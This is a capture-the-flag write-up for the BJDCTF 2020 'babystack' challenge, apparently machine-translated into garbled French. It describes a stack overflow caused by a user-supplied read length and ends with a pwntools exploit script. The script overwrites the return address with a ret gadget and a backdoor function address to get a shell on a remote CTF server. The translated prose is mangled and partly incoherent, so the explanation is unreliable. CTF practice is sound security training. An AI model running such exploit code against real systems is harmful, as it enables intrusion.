Bjdctf 2020 Bar _ Babystack

bjdctf_2020_babystack

checksec Un instant. 64Programme bit Je n'ai rien ouvert ,idaRegardez le programme

mainFonctions

Qu'en penses - tu?readLecture de la fonction0Chaîne (s),J'ai lu "solitude".,scanfNi déborder,On dirait qu'il n'y a pas de problème

MaisscanfUn nombre entré par l'utilisateur est lu et attribué ànbytes ,Et puisreadVa lirenbytesTaille des caractères,C'est - à - dire que nous pouvons déborder n'importe quelle longueur

backdoorFonctions

Lancez cette fonction pour obtenirshell

exp
ret C'est pour équilibrer la pile En fait backdoor Après la fonction +1Ça marche.

from pwn import *

io = process("./bjdctf_2020_babystack")
io = remote("node4.buuoj.cn",29159)
elf = ELF("./bjdctf_2020_babystack")
context(log_level="debug",arch="amd64")
backdoor = elf.symbols["backdoor"]
ret = 0x0000000000400561

print backdoor

io.sendlineafter(b"Please input the length of your name:","100")


payload = "a"*16 + "b"*8 + p64(ret) + p64(backdoor)
payload = flat(["a"*16,"b"*8,ret,backdoor])

io.sendlineafter("What's u name?",payload)
io.interactive()